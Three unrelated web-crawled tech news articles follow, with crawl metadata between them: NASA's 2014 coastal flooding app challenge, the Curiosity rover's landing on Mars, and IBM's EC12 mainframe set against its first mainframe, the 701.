Coastal flooding challenge uses cross-agency data NASA recently announced a new challenge focusing on coastal flooding to encourage entrepreneurs, technologists, and developers to create visualizations and simulations that will help people understand their exposure to coastal-inundation hazards and other vulnerabilities. The challenge will be included as part of the third annual International Space Apps Challenge, which will be held from April 11-13. It was developed by NASA and the National Oceanic and Atmospheric Administration, and is based on cross-agency data. The aim of the Coastal Inundation in Your Community challenge is to create tools and provide information so communities can prepare for coastal catastrophes. “Solutions developed through this challenge could have many potential impacts,” said NASA Chief Scientist Ellen Stofan. "This includes helping coastal businesses determine whether they are currently at risk from coastal inundation and whether they will be impacted in the future by sea level rise and coastal erosion." Many federal data sets are now available that illustrate the hazards of coastal inundation. As part of the Climate Data Initiative, the government has gathered data sets related to coastal vulnerability and the impact of future climate changes on flooding. The data sets will be available on climate.data.gov. The data comes from NOAA, NASA, the Federal Emergency Management Administration, the U.S. Geological Survey, the Environmental Protection Agency, the Army Corps of Engineers, the departments of Commerce and Defense as well as from New York and New Jersey. The purpose of the larger International Space Apps Challenge is to contribute to space exploration missions and improve life on earth. Participants introduce these solutions by developing mobile apps, software, hardware, data visualization and platform solutions. They will have access to over 200 data sources, including data sets, data services and tools. The challenge will be hosted at 100 locations over six different continents. Posted by Mike Cipriano on Apr 10, 2014 at 8:40 AM
<urn:uuid:b2d04df5-5f8b-4dd1-be0d-f7c57ca9b619>
CC-MAIN-2017-09
https://gcn.com/blogs/pulse/2014/04/nasa-coastal-flooding-challenge.aspx?admgarea=TC_BigData
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00599-ip-10-171-10-108.ec2.internal.warc.gz
en
0.930545
395
2.78125
3
One of the most complicated missions ever attempted by NASA, the landing of the one-ton rover Curiosity inside a crater on Mars after a 500 million kilometer journey, has apparently gone without a hitch. Curiosity landed at 10:32 p.m. Pacific Time on Sunday, 5:32 GMT Monday, and it wasn't long before the first pictures arrived, including one of the Martian surface framed by Curiosity's wheel. At a post-landing news conference, the scientists in charge of the program were welcomed like rock stars, and could barely contain their excitement. (You can watch a video of the event on YouTube.) "So that rocked. Seriously. Was that cool or what?" said Richard Cook, Deputy Project Manager, Mars Science Laboratory The jubilation at the landing capped a tense evening as the craft, as big as a car, hurtled towards Mars at almost 6,000 meters per second. A parachute slowed it down about 11 kilometers above the surface and then at 20 meters above the ground a brand new landing procedure, a rocket-propelled sky crane, lowered Curiosity onto Mars. None of this was controlled in real time. A 14-minute communications delay meant it all had to be programmed in advance, with no room for error. Had anything gone even slightly wrong, Curiosity would have smashed into the planet and the US$2.5 billion mission would have been a complete failure. NASA Administrator Charles Bolden said: "Nothing in robotic planetary exploration is harder, more technically challenging, or as risky as landing on the surface of Mars, and I know most of you are saying 'How can he be saying that? It just looked so easy.' Trust me. Historically, counting all the missions by all countries, the odds of success are about 40 percent. The recent U.S. record is better with now six successful missions including now four landing." Now begins a projected two-year mission. Planetary Scientist Chris McKay at NASA Ames Research Center in northern California will use Curiosity to look for organic compounds in the Martian dirt. "There're two important advances that I think Curiosity will bring to scientists like me," said McKay. "One is the ability to go up to different outcrops and different soil types and sample them. Dig in a pick something up and analyze it. And the other is the instruments themselves are much more sophisticated than previous examples. In the case of the instrument I'm involved in, the organic analyzer, this instrument has modes that the previous organic instrument on Viking did not have. And I think these modes will allow us to detect definitively, on Mars, the presence of organics. So I'm hoping that in maybe a couple of months, I can stand before you again and say yes, we know there are organics on Mars, here's their concentration, here's the type of organics that are there. That's very exciting. It's the first step towards advancing our knowledge of whether there was life on Mars and could we find evidence of it." With a team of 300 scientists working on the program, NASA hopes that's just one of many findings to come.
<urn:uuid:0cff8804-711c-4c09-94cc-562580b266aa>
CC-MAIN-2017-09
http://www.itworld.com/article/2724879/consumer-tech-science/nasa-s-curiosity-rover-lands-on-mars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00243-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965506
637
3.375
3
Remembering IBM's first mainframe, the 701 IBM's new zEnterprise EC12 mainframe boasts a power boost compared to the z196, the machine it replaces. System-wise, the EC12 features a 5.5-GHz, six-core processor, 101 cores (vs. 80 on the current z196), 161 capacity settings (vs. 125 on z196), 3T of memory and a radiator-based air-cooled system. Maybe that's not a giant leap in processing power over its predecessor, but it is practically a new species compared with IBM's original mainframe. IBM announced the delivery of its first mainframe on March 27, 1953: the 701 Data Processing System, of which 19 would be built that year, all of them destined for government agencies or defense industries. "The calculators," IBM said, would rent for $11,900/month, which would get customers a machine that can perform "more than 16,000 addition or subtraction operations a second, and more than 2,000 multiplication or division operations a second." Unlike its predecessor, the Selective Sequence Electronic Calculator, the 701 was not built into the room that housed it and took advantage of "all three of the most advanced electronic storage, or memory devices -- cathode ray tubes, magnetic drums and magnetic tapes." Components of the 701 included: an electronic analytical control unit, an electrostatic storage unit, a punched card reader, an alphabetical printer, a punched card recorder, two magnetic tape readers and recorders, (each including two magnetic tapes), a magnetic drum reader and recorder and units governing power supply and distribution. Of the 19 701s built, several were installed in government laboratories to speed calculations. At the National Oceanic and Atmospheric Administration, the Joint Numerical Weather Prediction Unit installed an IBM 701 computer in March 1955 to produce operational numerical weather prediction. At the Lawrence Livermore National Laboratory, the arrival of an IBM 701 in 1954 meant that scientists could run nuclear explosives computations much faster. For more big iron, visit IBM's mainframes photo album. Connect with the GCN staff on Twitter @GCNtech.
<urn:uuid:93b81e7b-42bb-4d91-8411-92487dce5319>
CC-MAIN-2017-09
https://gcn.com/articles/2012/08/29/ibm-zenterprise-ec12-mainframe-701.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00419-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926557
445
2.890625
3